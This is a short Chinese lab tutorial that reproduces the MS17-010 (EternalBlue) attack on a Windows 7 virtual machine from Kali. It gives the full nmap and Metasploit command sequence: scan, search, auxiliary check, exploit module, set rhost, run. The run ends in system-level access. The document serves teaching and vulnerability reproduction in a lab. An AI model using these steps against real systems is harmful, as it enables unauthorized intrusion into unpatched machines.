ms17-010(永恒之蓝)漏洞复现简单实验文档

137 阅读2分钟

环境准备

虚拟机软件:VMware Workstation Pro

攻击机:kali系统

靶机:windows7系统

在虚拟机中分别配置攻击机和靶机的网络模式为net模式

1687925627091.png

 实验部分

1.打开kali的终端

可以点击左上角图标打开终端或者鼠标右键,选择在这里打开终端进入终端。

1687925666063.png

2.切换管理员模式

命令:sudo su
1687925791052.png
在输入kali密码的时候,输入是隐藏了,把正确密码输入回车。看到如图显示的页面即成功切换权限。

3.分别查看攻击机和靶机的ip地址

win7:ipconfig

1687926703948.png
kali:ifconfig

1687926973886.png

4.使用nmap工具(kali自带一款漏扫工具)进行 扫描,查看靶机是否存活

命令:nmap 192.168.171.128 -sV 该ip地址为靶机的ip地址,-sV是指定让nmap进行版本探测

1687927099599.png
可以看到,靶机是win7系统且445端口(一个TCP端口)是开放(open)的,可以尝试进行ms17-010漏洞攻击。

5.启动Metasploit并使用其攻击

启动Metasploit命令: msfconsole

1687927176916.png
搜索ms17-010模块命令:search ms17-010

1687927282783.png
上图中的exploit是攻击模块,auxiliary是辅助模块,我们先使用辅助模块扫描判断漏洞是否存在 使用辅助模块3命令:use 3
查看该模块缺少的参数,命令:show options

image.png
上图中,required为yes的current setting为必填的,从上图可以看到我们需要给rhosts(攻击目标ip)设置值,命令:set rhost 192.168.171.128。再次使用show options命令查看是否还有参数缺失

image.png
确认必填参数均有值之后,开始扫描,命令:run

1687927688069.png
扫描结果可以看到,靶机确实存在ms17-010漏洞,接下来我们尝试去攻击。先从辅助模块切换到攻击模块,命令:use 0

1687927765113.png
再使用show options查看该模块缺失的参数

1687927823673.png
给rhosts(攻击目标ip)设置值,命令:set rhost 192.168.171.128。再次使用show options命令查看是否还有参数缺失

1687927897235.png
确认必填参数均有值之后,开始攻击run

image.png
最终拿到靶机系统权限,即渗透成功。接下来,我们就可以使用一些meterpreter命令对靶机系统进行操作了。